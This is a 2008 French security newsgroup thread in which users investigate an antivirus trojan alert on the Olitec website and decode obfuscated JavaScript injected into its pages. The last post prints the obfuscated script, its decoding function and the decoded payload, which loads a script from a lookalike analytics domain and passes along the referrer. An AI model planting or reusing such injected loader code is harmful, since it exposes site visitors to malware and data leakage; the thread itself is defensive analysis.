Twitter iPhone pliant OnePlus 11 PS5 Disney+ Orange Livebox Windows 11

Site Olitec verole ?

6 réponses
Avatar
Oliver One
Bonjour à tous,

J'essaie d'aller sur le site www.olitec.com (ça fait certainement plus
d'un an que j'y ait pas mis les pieds), alerte de mon AV :
JS/TrojanDownloader.Small.NAT cheval de Troie

Y'a des volontaires pour tester ?

--
Patience et longueur de temps font plus que force ni que rage
------------------------------
Olivier

6 réponses

Avatar
Yannick Palanque
Oliver One écrivit :
Y'a des volontaires pour tester ?



:~$ w3m !*
w3m www.olitec.com
w3m: Can't load www.olitec.com.

:~$ ping www.olitec.com
PING www.olitec.com (80.92.69.248) 56(84) bytes of data.
^C
--- www.olitec.com ping statistics ---
41 packets transmitted, 0 received, 100% packet loss, time 40018ms


Ce qui a peut-être un rapport avec ce que tu signalais. :-)

--
« Quand je serai grand, je ferai des bug reports sur la LKML »
-- Octane in fcolm * NNTP vaincra ! *
Un bon site web se visite agréablement sans mise en forme et
sans images. Sauvez un site web, mangez un webdesigner.
Avatar
Vivien Moreau
Yannick Palanque writes:

Oliver One écrivit :
Y'a des volontaires pour tester ?



:~$ w3m !*
w3m www.olitec.com
w3m: Can't load www.olitec.com.

:~$ ping www.olitec.com
PING www.olitec.com (80.92.69.248) 56(84) bytes of data.
^C
--- www.olitec.com ping statistics ---
41 packets transmitted, 0 received, 100% packet loss, time 40018ms


Ce qui a peut-être un rapport avec ce que tu signalais. :-)



C'est marrant, parce que ça marche pourtant chez moi !
--
Tuxicomane, alias Vivien Moreau.
Avatar
Francois
Vivien Moreau a présenté l'énoncé suivant :

w3m www.olitec.com



--FRAME--
menu
contenu
Viewing <Bienvenue dans le monde Olitec !>

--
François
Si le bol de riz qu'on te propose ne te convient pas, laisse le riz
et mange le bol.
Avatar
Loic Restoux
Le 19 oct, a 14:20, Oliver One papotait :
J'essaie d'aller sur le site www.olitec.com (ça fait certainement plus
d'un an que j'y ait pas mis les pieds), alerte de mon AV :
JS/TrojanDownloader.Small.NAT cheval de Troie

Y'a des volontaires pour tester ?



$ curl -v http://www.olitec.com | less
<HTML>
<HEAD>
[blablabla...]
</BODY></NOFRAMES>
</HTML>
[Quelques dizaines de lignes vides]
<!--0c298fc4f8142d157aee9e099337fc9d-><script language=javascript>
[Du javascript tout obfusqué]
</script>

J'ai des doutes sur le fait que ce soit un compteur de visites.

--
No fortunes found
Avatar
newdb
Loic Restoux wrote:
<!--0c298fc4f8142d157aee9e099337fc9d-><script language=javascript>
[Du javascript tout obfusqué]
</script>
J'ai des doutes sur le fait que ce soit un compteur de visites.



ç'est effectivement un *faux* googleanalytics (juste une lettre de
changée dans le nom de l'original) qui renvoie en fait vers un site
classé comme *malveillant* :

+-----------------
! Registrant:
! 29 Kompozitorov st.
! Saint Petersburg
! ,194358
! RU
+-----------------
! Creation Date:
! 01-Feb-2008
! ...


bravo olitec !

--
@@@@@
E -00 comme on est very beaux dis !
' `) /
|_ =="
Avatar
Serge Paccalin
Le mardi 21 octobre 2008 à 20:30:32, Loic Restoux a écrit dans
fr.comp.securite :

[Du javascript tout obfusqué]
</script>

J'ai des doutes sur le fait que ce soit un compteur de visites.



En effet, je confirme la réponse de denisb...

Un premier décodage donne (remis en forme) :
<script language=javascript>
var diz,brn;
function fcx(sl)
{
var
rg,s="3w4ETk]NBZ!#61:[J{$";~Ob}=*oqdlKmyCx+2A(pVhvU&n`c7j.H)9P,a5zMFr's8I-ei
0|_^g",nb="",qz,vb,jpi="",hf;
for (rg = 0; rg < sl.length; rg++)
{
qz = sl.charAt(rg);
vb = s.indexOf(qz);
if (vb > -1)
{
hf = ((vb + 1) % 81 - 1);
if (hf <= 0)
hf += 81;
jpi += s.charAt(hf - 1);
}
else
jpi += qz;
}
nb += jpi;
document.write(nb);
}

diz="<87' `3t53i*;.5U587' V@;>0lq7tyi`@H4'
@ip0;<SxR-,k0K5`3t53i*;{5U5S7'
V@;0SRx*;v@@VG//444H3qq3Ki5`/^^t@@H.8?;2lq7tyi`@H'i[i''i'2;;></SxR-,k>;09~0</87'
V@>0";
fcx(diz);
</script>

Un deuxième décodage donne le code final :

<script language="javascript"> document.write( "<SCRIPT
language="JavaScript"
SRC="http://www.googleanalytlcs.com/__utt.js?"+document.referrer+""></SCRIPT>&quot;
); </script>

--
___________
_/ _ _`_`_`_) Serge PACCALIN -- sp ad mailclub.net
_L_) Il faut donc que les hommes commencent
-'(__) par n'être pas fanatiques pour mériter
_/___(_) la tolérance. -- Voltaire, 1763